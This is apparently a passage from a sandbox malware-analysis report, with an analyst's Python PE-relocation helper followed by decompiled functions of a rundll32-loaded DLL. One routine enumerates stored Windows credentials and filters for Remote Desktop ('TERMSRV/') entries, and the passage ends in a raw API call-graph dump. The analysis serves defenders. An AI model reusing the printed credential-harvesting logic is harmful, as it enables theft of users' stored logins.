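IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address: add the load delta


def read_u32(buf: bytes, off: int) -> int:
    return struct.unpack_from("<I", buf, off)[0]


def nt_headers(image: bytes) -> int:
    """e_lfanew, the load at image+0x3C (011E95B4 and 011E95F0)."""
    return read_u32(image, 0x3C)


def size_of_image(image: bytes) -> int:
    """OptionalHeader.SizeOfImage is 0x50 bytes into the NT headers."""
    return read_u32(image, nt_headers(image) + 0x50)


def image_base(image: bytes) -> int:
    return read_u32(image, nt_headers(image) + 0x34)


def reloc_directory(image: bytes):
    """DataDirectory[5] (BASERELOC): VirtualAddress at +0xA0, Size at +0xA4."""
    nt = nt_headers(image)
    return read_u32(image, nt + 0xA0), read_u32(image, nt + 0xA4)


def relocate(image: bytes, new_base: int) -> bytes:
    """Apply HIGHLOW fixups to a copy of an image whose RVAs equal offsets."""
    buf = bytearray(image)
    delta = (new_base - image_base(image)) & 0xFFFFFFFF
    rva, size = reloc_directory(image)
    pos, end = rva, rva + size
    while pos + 8 <= end:
        page_rva, block_size = struct.unpack_from("<II", buf, pos)
        if block_size < 8:
            break
        for off in range(pos + 8, pos + block_size, 2):
            entry = struct.unpack_from("<H", buf, off)[0]
            typ, target = entry >> 12, page_rva + (entry & 0xFFF)
            if typ == IMAGE_REL_BASED_HIGHLOW:
                val = read_u32(buf, target)
                struct.pack_into("<I", buf, target, (val + delta) & 0xFFFFFFFF)
        pos += block_size
    return bytes(buf)


def build_test_image(base: int = 0x11E0000) -> bytes:
    """Constructed minimal PE32 image (not the sample): DOS stub, NT headers, one
    absolute pointer at 0x300 and one .reloc block at 0x400 describing it."""
    img = bytearray(0x500)
    img[0:2] = b"MZ"
    nt = 0x80
    struct.pack_into("<I", img, 0x3C, nt)
    img[nt:nt + 4] = b"PE\x00\x00"
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                      # PE32 magic
    struct.pack_into("<I", img, opt + 0x1C, base)                # ImageBase   (nt+0x34)
    struct.pack_into("<I", img, opt + 0x38, 0x500)               # SizeOfImage (nt+0x50)
    struct.pack_into("<II", img, opt + 0x60 + 5 * 8, 0x400, 12)  # reloc dir   (nt+0xA0)
    struct.pack_into("<I", img, 0x300, base + 0x1234)            # VA that needs a fixup
    struct.pack_into("<IIHH", img, 0x400, 0, 12,
                     (IMAGE_REL_BASED_HIGHLOW << 12) | 0x300,
                     (IMAGE_REL_BASED_ABSOLUTE << 12))
    return bytes(img)


if __name__ == "__main__":
    img = build_test_image()
    print(hex(read_u32(relocate(img, 0x400000), 0x300)))
```

Two things worth keeping in mind when reading the decompilation against this: the function takes SizeOfImage from one buffer and the relocation directory from another, so the two are only interchangeable if 0x2f1c10 holds another mapping of the same image, which this function does not establish; and the zero-fill before VirtualFree means the relocated copy will not be in a post-run memory dump.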
    C-Code - Quality: 35%
    			E011E7B31(intOrPtr _a4) {
    				void* _v8;
    				void* _v12;
    				char _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				void* __esi;
    				char* _t30;
    				signed int _t32;
    				intOrPtr _t33;
    				signed int _t38;
    				signed short* _t41;
    				void* _t44;
    				char* _t45;
    				signed short* _t49;
    
    				_t38 = 0;
    				_t30 =  &_v8;
    				_v12 = 0;
    				_v8 = 0;
    				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
    				_v24 = _t30;
    				if(_t30 == 0) {
    					L19:
    					return _v24;
    				}
    				_t32 = 0;
    				_v20 = 0;
    				if(_v8 <= 0) {
    					L18:
    					__imp__CredFree(_v12);
    					goto L19;
    				}
    				do {
    					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
    					_t49 =  *(_t33 + 8);
    					if(_t49 == _t38) {
    						L14:
    						if( *((intOrPtr*)(_t33 + 4)) != 2) {
    							goto L16;
    						}
    						L15:
    						E011E6FC7(_t49, 0, _a4);
    						goto L16;
    					}
    					_v16 = 8;
    					_t45 = L"TERMSRV/";
    					_t41 = _t49;
    					while( *_t41 ==  *_t45) {
    						_t41 =  &(_t41[1]);
    						_t45 =  &(_t45[2]);
    						_t13 =  &_v16;
    						 *_t13 = _v16 - 1;
    						if( *_t13 != 0) {
    							continue;
    						}
    						_t38 = 0;
    						_t44 = 0;
    						L8:
    						if((0 | _t44 == _t38) == _t38) {
    							goto L14;
    						}
    						_t49 =  &(_t49[8]);
    						if( *((intOrPtr*)(_t33 + 4)) != 1) {
    							goto L14;
    						}
    						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
    							E011E6DE0( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
    						}
    						goto L15;
    					}
    					asm("sbb ecx, ecx");
    					_t44 = ( *_t41 & 0xfffe) + 1;
    					_t38 = 0;
    					goto L8;
    					L16:
    					_t32 = _v20 + 1;
    					_v20 = _t32;
    				} while (_t32 < _v8);
    				goto L18;
    			}

    APIs
    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 011E7B4A
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
    • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 011E7C02
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E7D6F(intOrPtr* _a4) {
    				short _v1564;
    				intOrPtr* _t7;
    				intOrPtr _t15;
    				void* _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    
    				_t17 = 0;
    				_t19 =  *0x11ff0fc - _t17; // 0x2f1c10
    				if(_t19 == 0) {
    					L8:
    					return _t17;
    				}
    				_t20 =  *0x11ff11c - _t17; // 0x58778
    				if(_t20 != 0) {
    					_t7 = _a4;
    					_t16 = _t7 + 2;
    					do {
    						_t15 =  *_t7;
    						_t7 = _t7 + 2;
    					} while (_t15 != 0);
    					if(E011E96C7(L"127.0.0.1", _a4, _t7 - _t16 >> 1) != 0) {
    						Sleep(0xbb8);
    						if(E011E8320( &_v1564) != 0 && PathFileExistsW( &_v1564) != 0) {
    							_t17 = 1;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 011E96C7: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E96F4
      • Part of subcall function 011E96C7: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 011E9735
      • Part of subcall function 011E96C7: inet_addr.WS2_32(?), ref: 011E9742
    • Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 011E7DB7
      • Part of subcall function 011E8320: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
      • Part of subcall function 011E8320: PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
      • Part of subcall function 011E8320: PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    • PathFileExistsW.SHLWAPI(?), ref: 011E7DD4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6916(char* _a4) {
    				int _v8;
    				short* _v12;
    				int _t7;
    				short* _t11;
    				int _t12;
    				short* _t13;
    
    				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
    				_v8 = _t7;
    				if(_t7 == 0) {
    					L3:
    					return 0;
    				}
    				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
    				_v12 = _t11;
    				if(_t11 == 0) {
    					goto L3;
    				}
    				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
    				_t13 = _v12;
    				if(_t12 == 0) {
    					goto L3;
    				}
    				return _t13;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
    • GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
    • HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6CAA(void** _a4) {
    				void* _t3;
    				void* _t4;
    				void** _t7;
    				void* _t8;
    
    				_t7 = _a4;
    				if(_t7 != 0) {
    					_t4 =  *_t7;
    					if(_t4 != 0) {
    						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
    					}
    					_t8 = _t7[1];
    					if(_t8 != 0) {
    						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
    					}
    					return _t4;
    				}
    				return _t3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 011E6CCC
    • HeapFree.KERNEL32(00000000), ref: 011E6CCF
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6CDB
    • HeapFree.KERNEL32(00000000), ref: 011E6CDE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E711F(signed int _a4, intOrPtr _a8) {
    				void* __ebx;
    				signed int* _t11;
    				void* _t13;
    
    				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
    				if(_t11 != 0) {
    					 *_t11 =  *_t11 & 0x00000000;
    					_t11[1] = _a4;
    					if(E011E7167(_t11, _t13, _a8) == 0) {
    						_t11 = 0;
    						HeapFree(GetProcessHeap(), 0, 0);
    					}
    				}
    				return _t11;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
    • HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
    • HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd

    Execution Graph

    Execution Coverage:21.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:4.1%
    Total number of Nodes:1285
    Total number of Limit Nodes:46

    Graph

(Execution graph: the rendered graph did not survive extraction; only its raw node and edge dump remained. Its nodes carry addresses in the 0xf6xxxx range rather than the 0x11e0000 image decompiled above, with CRT helper names such as __amsg_exit, __wcsicoll, __CxxUnhandledExceptionFilter, __getptd, __XcptFilter, __initterm_e, __RTC_Initialize, ___crtLCMapStringA and _wparse_cmdline, and API nodes including FreeLibrary, LocalFree, RtlEqualUnicodeString, RtlInitUnicodeString, RtlGetNtVersionNumbers followed by RtlAdjustPrivilege, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, SetUnhandledExceptionFilter, HeapSetInformation, HeapCreate, GetProcessHeap, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetStdHandle, GetFileType, SetHandleCount, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, InterlockedIncrement, GetCurrentThreadId, GetLastError, SetLastError, CloseHandle and Sleep.)
3693->3692 3696 f6429f InterlockedIncrement 3694->3696 3697 f642a2 3694->3697 3695->3694 3696->3697 3698 f642bb InterlockedIncrement 3697->3698 3699 f642cb InterlockedIncrement 3697->3699 3700 f642d6 InterlockedIncrement 3697->3700 3698->3697 3699->3697 3700->3636 3866 f6603e LeaveCriticalSection 3701->3866 3703 f646c8 3703->3638 3705 f66061 __CxxUnhandledExceptionFilter 3704->3705 3706 f66087 3705->3706 3729 f651a6 3705->3729 3712 f66097 __CxxUnhandledExceptionFilter 3706->3712 3765 f66184 3706->3765 3710 f660a2 3713 f660a9 3710->3713 3714 f660b8 3710->3714 3712->3683 3718 f64c83 __wcsicoll 65 API calls 3713->3718 3717 f66117 ___crtLCMapStringA 65 API calls 3714->3717 3715 f6607d 3762 f64d11 3715->3762 3719 f660bf 3717->3719 3718->3712 3720 f660c7 InitializeCriticalSectionAndSpinCount 3719->3720 3721 f660f2 3719->3721 3723 f660d7 3720->3723 3728 f660e3 3720->3728 3722 f6614a __freea 65 API calls 3721->3722 3722->3728 3724 f6614a __freea 65 API calls 3723->3724 3726 f660dd 3724->3726 3727 f64c83 __wcsicoll 65 API calls 3726->3727 3727->3728 3770 f6610e 3728->3770 3773 f67578 3729->3773 3731 f651ad 3732 f67578 __amsg_exit 66 API calls 3731->3732 3734 f651ba 3731->3734 3732->3734 3733 f64ff7 __amsg_exit 66 API calls 3735 f651d2 3733->3735 3734->3733 3737 f651dc 3734->3737 3736 f64ff7 __amsg_exit 66 API calls 3735->3736 3736->3737 3738 f64ff7 3737->3738 3739 f65018 __amsg_exit 3738->3739 3740 f65134 3739->3740 3741 f67578 __amsg_exit 63 API calls 3739->3741 3834 f65f8e 3740->3834 3743 f65032 3741->3743 3745 f65143 GetStdHandle 3743->3745 3746 f67578 __amsg_exit 63 API calls 3743->3746 3744 f651a4 3744->3715 3745->3740 3750 f65151 _strlen 3745->3750 3747 f65043 3746->3747 3747->3745 3748 f65055 3747->3748 3748->3740 3798 f67515 3748->3798 3750->3740 3752 f65187 WriteFile 3750->3752 3752->3740 3753 f65081 GetModuleFileNameW 3754 f650a2 3753->3754 3759 f650ae _wcslen 3753->3759 3756 f67515 __amsg_exit 63 API calls 3754->3756 3755 f64bdf __amsg_exit 10 API calls 
3755->3759 3756->3759 3758 f673b8 63 API calls __amsg_exit 3758->3759 3759->3755 3759->3758 3760 f65124 3759->3760 3807 f6742d 3759->3807 3816 f6724c 3760->3816 3844 f64ce6 GetModuleHandleW 3762->3844 3769 f6618d 3765->3769 3767 f661c3 3767->3710 3768 f661a4 Sleep 3768->3769 3769->3767 3769->3768 3848 f677dc 3769->3848 3864 f6603e LeaveCriticalSection 3770->3864 3772 f66115 3772->3712 3774 f67584 3773->3774 3775 f64c83 __wcsicoll 66 API calls 3774->3775 3776 f6758e 3774->3776 3777 f675a7 3775->3777 3776->3731 3780 f64c31 3777->3780 3783 f64c04 DecodePointer 3780->3783 3784 f64c19 3783->3784 3789 f64bdf 3784->3789 3786 f64c30 3787 f64c04 __wcsicoll 10 API calls 3786->3787 3788 f64c3d 3787->3788 3788->3731 3792 f64ab6 3789->3792 3793 f64ad5 setSBUpLow 3792->3793 3794 f64af3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3793->3794 3796 f64bc1 setSBUpLow 3794->3796 3795 f65f8e setSBUpLow 5 API calls 3797 f64bdd GetCurrentProcess TerminateProcess 3795->3797 3796->3795 3797->3786 3799 f67523 3798->3799 3801 f6752a 3798->3801 3799->3801 3805 f6754b 3799->3805 3800 f64c83 __wcsicoll 66 API calls 3802 f6752f 3800->3802 3801->3800 3803 f64c31 __wcsicoll 11 API calls 3802->3803 3804 f65076 3803->3804 3804->3753 3804->3759 3805->3804 3806 f64c83 __wcsicoll 66 API calls 3805->3806 3806->3802 3812 f6743f 3807->3812 3808 f67443 3809 f67448 3808->3809 3810 f64c83 __wcsicoll 66 API calls 3808->3810 3809->3759 3811 f6745f 3810->3811 3813 f64c31 __wcsicoll 11 API calls 3811->3813 3812->3808 3812->3809 3814 f67486 3812->3814 3813->3809 3814->3809 3815 f64c83 __wcsicoll 66 API calls 3814->3815 3815->3811 3842 f64593 EncodePointer 3816->3842 3818 f67272 3819 f672ff 3818->3819 3820 f67282 LoadLibraryW 3818->3820 3826 f67319 DecodePointer DecodePointer 3819->3826 3827 f6732c 3819->3827 3821 f67397 3820->3821 3822 f67297 GetProcAddress 3820->3822 3829 f65f8e setSBUpLow 5 API calls 3821->3829 3822->3821 3825 f672ad 7 API calls 3822->3825 3823 f67362 DecodePointer 
3824 f6738b DecodePointer 3823->3824 3828 f67369 3823->3828 3824->3821 3825->3819 3830 f672ef GetProcAddress EncodePointer 3825->3830 3826->3827 3827->3823 3827->3824 3833 f6734f 3827->3833 3828->3824 3832 f6737c DecodePointer 3828->3832 3831 f673b6 3829->3831 3830->3819 3831->3740 3832->3824 3832->3833 3833->3824 3835 f65f96 3834->3835 3836 f65f98 IsDebuggerPresent 3834->3836 3835->3744 3843 f667c5 3836->3843 3839 f67969 SetUnhandledExceptionFilter UnhandledExceptionFilter 3840 f6798e GetCurrentProcess TerminateProcess 3839->3840 3841 f67986 setSBUpLow 3839->3841 3840->3744 3841->3840 3842->3818 3843->3839 3845 f64d0f ExitProcess 3844->3845 3846 f64cfa GetProcAddress 3844->3846 3846->3845 3847 f64d0a 3846->3847 3847->3845 3849 f67859 3848->3849 3858 f677ea 3848->3858 3850 f66f6c ___crtLCMapStringA DecodePointer 3849->3850 3851 f6785f 3850->3851 3853 f64c83 __wcsicoll 65 API calls 3851->3853 3852 f651a6 __amsg_exit 65 API calls 3852->3858 3854 f67851 3853->3854 3854->3769 3855 f67818 HeapAlloc 3855->3854 3855->3858 3856 f64ff7 __amsg_exit 65 API calls 3856->3858 3857 f67845 3860 f64c83 __wcsicoll 65 API calls 3857->3860 3858->3852 3858->3855 3858->3856 3858->3857 3859 f64d11 __amsg_exit 3 API calls 3858->3859 3861 f66f6c ___crtLCMapStringA DecodePointer 3858->3861 3862 f67843 3858->3862 3859->3858 3860->3862 3861->3858 3863 f64c83 __wcsicoll 65 API calls 3862->3863 3863->3854 3864->3772 3865->3688 3866->3703 3868 f670d4 EncodePointer 3867->3868 3868->3868 3869 f670ee 3868->3869 3869->3567 3873 f6707b 3870->3873 3872 f670c4 3872->3569 3874 f67087 __CxxUnhandledExceptionFilter 3873->3874 3881 f64d29 3874->3881 3880 f670a8 __CxxUnhandledExceptionFilter 3880->3872 3882 f66117 ___crtLCMapStringA 66 API calls 3881->3882 3883 f64d30 3882->3883 3884 f66f94 DecodePointer DecodePointer 3883->3884 3885 f66fc2 3884->3885 3886 f67043 3884->3886 3885->3886 3900 f67c27 3885->3900 3897 f670b1 3886->3897 3888 f66fd4 3889 f67026 EncodePointer EncodePointer 3888->3889 3890 f66fef 
3888->3890 3891 f66ffe 3888->3891 3889->3886 3907 f66215 3890->3907 3891->3886 3893 f66ff8 3891->3893 3893->3891 3894 f66215 70 API calls 3893->3894 3896 f67014 EncodePointer 3893->3896 3895 f6700e 3894->3895 3895->3886 3895->3896 3896->3889 3933 f64d32 3897->3933 3901 f67c32 3900->3901 3902 f67c47 HeapSize 3900->3902 3903 f64c83 __wcsicoll 66 API calls 3901->3903 3902->3888 3904 f67c37 3903->3904 3905 f64c31 __wcsicoll 11 API calls 3904->3905 3906 f67c42 3905->3906 3906->3888 3911 f6621e 3907->3911 3909 f6625d 3909->3893 3910 f6623e Sleep 3910->3911 3911->3909 3911->3910 3912 f67a24 3911->3912 3913 f67a2f 3912->3913 3914 f67a3a 3912->3914 3915 f677dc ___crtLCMapStringA 66 API calls 3913->3915 3916 f67a42 3914->3916 3917 f67a4f 3914->3917 3919 f67a37 3915->3919 3918 f6614a __freea 66 API calls 3916->3918 3920 f67a87 3917->3920 3921 f67a57 HeapReAlloc 3917->3921 3924 f67ab7 3917->3924 3927 f66f6c ___crtLCMapStringA DecodePointer 3917->3927 3929 f67a9f 3917->3929 3930 f67a4a __freea 3918->3930 3919->3911 3922 f66f6c ___crtLCMapStringA DecodePointer 3920->3922 3921->3917 3921->3930 3923 f67a8d 3922->3923 3925 f64c83 __wcsicoll 66 API calls 3923->3925 3926 f64c83 __wcsicoll 66 API calls 3924->3926 3925->3930 3928 f67abc GetLastError 3926->3928 3927->3917 3928->3930 3931 f64c83 __wcsicoll 66 API calls 3929->3931 3930->3911 3932 f67aa4 GetLastError 3931->3932 3932->3930 3936 f6603e LeaveCriticalSection 3933->3936 3935 f64d39 3935->3880 3936->3935 3949 f62e19 3937->3949 3941 f6202c InitializeSecurityDescriptor 3940->3941 3945 f620ad 3940->3945 3942 f62039 SetSecurityDescriptorDacl 3941->3942 3941->3945 3942->3945 3948 f6204b 3942->3948 3943 f62051 CreateFileW 3944 f62072 GetModuleHandleW GetProcAddress 3943->3944 3943->3945 3944->3948 3945->3572 3946 f6209b WaitNamedPipeW 3946->3945 3946->3948 3947 f62093 Sleep 3947->3948 3948->3943 3948->3945 3948->3946 3948->3947 3965 f62b7d 3949->3965 3952 f6315d 3952->3573 3953 f61149 10 API calls 3955 f62efd 3953->3955 3954 f62f14 
GetModuleHandleW GetProcAddress 3954->3955 3955->3952 3955->3954 3956 f6313c LocalFree 3955->3956 3957 f61efa 12 API calls 3955->3957 3958 f61149 10 API calls 3955->3958 3959 f63090 GetModuleHandleW GetProcAddress 3955->3959 3961 f630f9 LocalFree 3955->3961 3962 f63107 LocalFree 3955->3962 3963 f63118 LocalFree 3955->3963 3964 f63122 LocalFree 3955->3964 3986 f63285 3955->3986 3956->3955 3957->3955 3958->3955 3959->3955 3961->3955 3962->3955 3963->3955 3964->3955 3966 f62dba 3965->3966 3967 f62bb6 3965->3967 3966->3952 3966->3953 3966->3955 3967->3966 3968 f62bd6 CreateFileW 3967->3968 3969 f62bf0 3967->3969 3971 f62c15 3968->3971 4019 f61982 RtlInitUnicodeString 3969->4019 3972 f62da0 3971->3972 4025 f61041 GetModuleHandleW GetProcAddress 3971->4025 4043 f6110e 3972->4043 3975 f62c06 OpenProcess 3975->3971 3976 f62dab CloseHandle 3976->3966 3978 f62c36 3978->3972 3979 f62cb1 GetCurrentProcess IsWow64Process 3978->3979 3981 f62c45 3978->3981 3979->3981 3980 f62cf1 3980->3972 3980->3981 3992 f619ee 3980->3992 3981->3972 3981->3980 3985 f62c8a 3981->3985 3985->3966 3985->3972 4103 f631ab GetComputerNameW 3986->4103 3988 f6328e 3989 f632dc 3988->3989 4115 f63640 3988->4115 4128 f63642 3988->4128 3989->3955 3993 f61c9e 3992->3993 3994 f61a2c 3992->3994 3995 f61d5f 13 API calls 3993->3995 3996 f61a33 3994->3996 3997 f61b8e 3994->3997 4004 f61ca8 3995->4004 3999 f61a3a 3996->3999 4013 f61afc _wcsrchr 3996->4013 4057 f61d5f 3997->4057 4000 f61a3d 3999->4000 4050 f618d9 3999->4050 4000->3972 4035 f634d4 4000->4035 4003 f61149 10 API calls 4016 f61bc4 4003->4016 4004->4000 4005 f61cfa 17 API calls 4004->4005 4005->4004 4006 f61a53 4006->4000 4009 f61ab2 4006->4009 4007 f61149 10 API calls 4007->4016 4008 f61b53 RtlInitUnicodeString 4010 f61cfa 17 API calls 4008->4010 4009->4006 4014 f61ac1 RtlInitUnicodeString 4009->4014 4071 f61fa9 4009->4071 4010->4013 4011 f61c11 GetModuleHandleW GetProcAddress 4011->4016 4013->4000 4013->4008 4015 f61ada LocalFree 4014->4015 4015->4009 
4016->4000 4016->4007 4016->4011 4017 f61c85 LocalFree 4016->4017 4066 f61cfa 4016->4066 4017->4016 4020 f618d9 5 API calls 4019->4020 4021 f619b7 4020->4021 4022 f619e8 4021->4022 4024 f619dc LocalFree 4021->4024 4089 f6194b RtlEqualUnicodeString 4021->4089 4022->3972 4022->3975 4024->4022 4026 f6106b 4025->4026 4027 f61090 GetModuleHandleW GetProcAddress 4026->4027 4029 f610bf GetModuleHandleW GetProcAddress 4026->4029 4030 f61088 4026->4030 4031 f610a1 4026->4031 4032 f610aa 4026->4032 4027->4031 4028 f610fd LocalFree 4028->4032 4033 f610d0 4029->4033 4030->4027 4030->4028 4031->4028 4031->4032 4032->3978 4033->4028 4091 f61487 GetModuleHandleW GetProcAddress 4033->4091 4036 f6350f 4035->4036 4037 f6134e 13 API calls 4036->4037 4042 f63588 4036->4042 4038 f6352f 4037->4038 4039 f61149 10 API calls 4038->4039 4038->4042 4040 f63560 4039->4040 4041 f61149 10 API calls 4040->4041 4040->4042 4041->4042 4042->3985 4044 f61146 4043->4044 4045 f61112 4043->4045 4044->3976 4047 f6112e LocalFree 4045->4047 4048 f61503 2 API calls 4045->4048 4049 f61121 4045->4049 4046 f6112c LocalFree 4046->4047 4047->3976 4048->4049 4049->4046 4049->4047 4051 f618f8 4050->4051 4052 f618e5 NtQuerySystemInformation 4050->4052 4053 f61946 4051->4053 4054 f618fe GetModuleHandleW GetProcAddress 4051->4054 4055 f61920 NtQuerySystemInformation 4051->4055 4052->4053 4053->4006 4054->4051 4055->4051 4056 f61934 LocalFree 4055->4056 4056->4051 4058 f61d7b GetCurrentProcess 4057->4058 4059 f61d74 4057->4059 4058->4059 4060 f61d99 4059->4060 4061 f61dde RtlGetCurrentPeb 4059->4061 4062 f61b9e 4060->4062 4063 f61d9c NtQueryInformationProcess 4060->4063 4061->4062 4062->4000 4062->4003 4063->4062 4064 f61db2 4063->4064 4064->4062 4065 f61149 10 API calls 4064->4065 4065->4062 4075 f61df3 4066->4075 4069 f61d0f LocalFree 4069->4016 4070 f61d21 4070->4016 4072 f61faf 4071->4072 4074 f61fd3 4071->4074 4073 f61fb3 GetModuleHandleW GetProcAddress 4072->4073 4072->4074 4073->4074 4074->4009 4074->4074 4076 
